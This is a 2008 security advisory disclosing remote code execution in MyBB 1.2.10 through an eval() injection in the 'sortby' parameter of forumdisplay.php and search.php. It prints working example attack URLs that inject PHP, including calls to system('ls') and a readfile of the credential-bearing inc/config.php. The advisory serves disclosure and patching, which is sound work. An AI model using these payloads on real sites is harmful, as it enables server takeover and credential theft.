=0D
[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10=0D
================================================================================0D
=0D
Author: Janek Vind "waraxe"=0D
Independent discovery: koziolek=0D
Date: 16. January 2008=0D
Location: Estonia, Tartu=0D
Web: http://www.waraxe.us/advisory-61.html=0D 
=0D
=0D
Target software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
MyBB is a discussion board that has been around for a while; it has evolved=0D
from other bulletin boards into the forum package it is today. Therefore,=0D
it is a professional and efficient discussion board, developed by an active=0D
team of developers.=0D
=0D
Vulnerabilities discovered=0D
================================================================================0D
=0D
1. Remote Code Execution in "forumdisplay.php":=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Precondition: valid forum "fid" must be known.=0D
Attacker doesn't need to have any privileges in mybb installation to be=0D
successful in attack.=0D
=0D
Proof-Of-Concept request:=0D
=0D
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='=0D 
=0D
... and we will see error message:=0D
=0D
Parse error: syntax error, unexpected ''', expecting ']' in=0D
C:\apache_wwwroot\mybb.1.2.10\forumdisplay.php(407) : eval()'d code on line 1=0D
=0D
Problematic piece of code is related to "eval()" function:=0D
=0D
eval("\$orderarrow['$sortby'] = \"".=0D
$templates->get("forumdisplay_orderarrow")."\";");=0D
=0D
=0D
Example attacks:=0D
=0D
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2=0D 
&sortby='];phpinfo();exit;//=0D
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2=0D 
&sortby='];system('ls');exit;//=0D
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2=0D 
&sortby='];readfile('inc/config.php');exit;//=0D
=0D
=0D
2. Remote Code Execution in "search.php":=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Precondition: search "sid" must be known - but that's trivial task.=0D
Attacker doesn't need to have any privileges in mybb installation to be=0D
successful in attack.=0D
=0D
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]=0D 
&sortby='=0D
=0D
Parse error: syntax error, unexpected ''', expecting ']' in=0D
C:\apache_wwwroot\mybb.1.2.10\search.php(141) : eval()'d code on line 1=0D
=0D
Problematic is exactly same piece of code, as in previous case:=0D
=0D
eval("\$orderarrow['$sortby'] = \"".=0D
$templates->get("forumdisplay_orderarrow")."\";");=0D
=0D
Example attacks:=0D
=0D
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]=0D 
&sortby='];phpinfo();exit;//=0D
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]=0D 
&sortby='];system('ls');exit;//=0D
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]=0D 
&sortby='];readfile('inc/config.php');exit;//=0D
=0D
Both remote code execution security holes are very dangerous and can be=0D
used by attacker to complete takeover the website and possible total=0D
compromise of webserver.=0D
=0D
How to fix:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Download MyBB new version 1.2.11 as soon as possible!=0D
=0D
=0D
Greetings:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb=0D
and anyone else who know me!=0D
Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale!=0D
=0D
Contact:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
come2waraxe@yahoo.com=0D 
Janek Vind "waraxe"=0D
=0D
Homepage: http://www.janekvind.com/=0D 
Waraxe forum: http://www.waraxe.us/forums.html=0D 
=0D
---------------------------------- [ EOF ] ------------------------------------=0D